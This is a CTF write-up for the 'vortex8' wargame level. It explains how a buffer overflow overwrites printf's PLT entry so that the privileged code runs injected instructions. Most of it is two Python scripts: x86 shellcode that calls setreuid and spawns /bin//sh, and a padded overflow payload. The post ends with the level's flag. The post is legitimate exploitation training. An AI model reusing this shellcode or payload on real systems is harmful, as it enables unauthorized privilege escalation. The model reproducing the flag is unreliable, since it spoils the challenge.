← Back
vortex8 | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

in this level we can use buffer overflow to inject our code image.

the safe function below: image.

while the unsafe function: image.

as you can see we can use buffer overflow to inject our code, however, the code drops our privileges before execute the unsafe function.

we will modify the plt_print and then, in the safe code which runs with the higher privileges, we will execute our shellcode.

this will be our shellcode that’ll be in the return address of the unsafe function:

mov eax, plt_printf_address
mov ebx, shellcode_address
mov [eax], ebx

push 1
pop eax 
int 0x80  => exit()

#!/usr/bin/python3
import sys
from pwn import p32
NOP_SLIDE = 50

print = lambda *args, **kwargs: None # override print function


plt_printf_address = 0x0804c004
shellcode_address = 0xffffd56a
# mov eax, plt_printf_address
# mov ebx, shellcode_address
# mov [eax], ebx
shellcode_change_plt = (
    b"\xb8" + p32(plt_printf_address) # mov eax, plt_printf_address
    + b"\xbb" + p32(shellcode_address) # mov ebx, shellcode_address
    + b"\x89\x18" # mov [eax], ebx (change the value at eax to shellcode_address)
            # mov eax, 1         ; system call number (sys_exit)
    b"\x6a\x01"  # push 1
    b"\x58"      # pop eax (sys_exit)
    # int 0x80
    b"\xcd\x80"  # int 0x80 (exit())
)


# setreuid(geteuid(), geteuid())
# execv("/bin//sh", argv)

# Shellcode in Python
shellcode = (
    b"\x6a\x31"  # push 0x31 (49)
    b"\x58"      # pop eax
    b"\xcd\x80"  # int 0x80 (geteuid())

    b"\x89\xc3"  # mov ebx, eax (uid)
    b"\x89\xd9"  # mov ecx, ebx
    b"\x6a\x46"  # push 0x46 (70)
    b"\x58"      # pop eax
    b"\xcd\x80"  # int 0x80, setreuid(geteuid(), geteuid())

    b"\x31\xd2"  # xor edx, edx
    b"\x52"      # push edx, which is \0
    b"\x68\x2f\x2f\x73\x68"  # push "//sh"
    b"\x68\x2f\x62\x69\x6e"  # push "/bin"
    b"\x89\xe3"  # mov ebx, esp (now ebx contains: "/bin//sh",\x00)

    b"\x52"      # push edx (push NULL into stack)
    b"\x53"      # push ebx (push pathname)
    b"\x89\xe1"  # mov ecx, esp (ecx is argv)

    b"\xb0\x0b"  # mov al, 0x0b (11)
    b"\xcd\x80"  # int 0x80 (execv("/bin//sh", argv))

        # mv eax, 1         ; system call number (sys_exit)
    b"\x6a\x01"  # push 1
    b"\x58"      # pop eax (sys_exit)
    # int 0x80
    b"\xcd\x80"  # int 0x80 (exit())
)

# Print shellcode details
print("Shellcode code is:")
print("setreuid(geteuid(), geteuid())")
print("execv(\"/bin//sh\", argv)")

# Print shellcode with NOP slide
print("\nShellcode as formatted string:")

# Add NOP slide (\x90) before shellcode
nop_slide = b"\x90" * NOP_SLIDE
formatted_shellcode = nop_slide +  shellcode_change_plt + nop_slide + shellcode

# Convert to formatted string
formatted_string = "".join(f"\\x{byte:02x}" for byte in formatted_shellcode)
print(formatted_string)

# Print shellcode in hex format
print("\nShellcode in hex format:")
print("".join(f"{byte:02x}" for byte in formatted_shellcode))

# Calculate shellcode length
print(f"\nLength of shellcode is {len(formatted_shellcode)} bytes")

sys.stdout.buffer.write(formatted_shellcode)
# export SHELLCODE=$(python3 shellcode.py)


#!/usr/bin/python3
import sys
from pwn import p32

shellcode_address = 0xffffd510

payload = b'A'*1036
payload += p32(shellcode_address)

sys.stdout.buffer.write(payload)

. so, modify shellcode_address, and execute those lines:

image.

Flag: hCuwrgfqn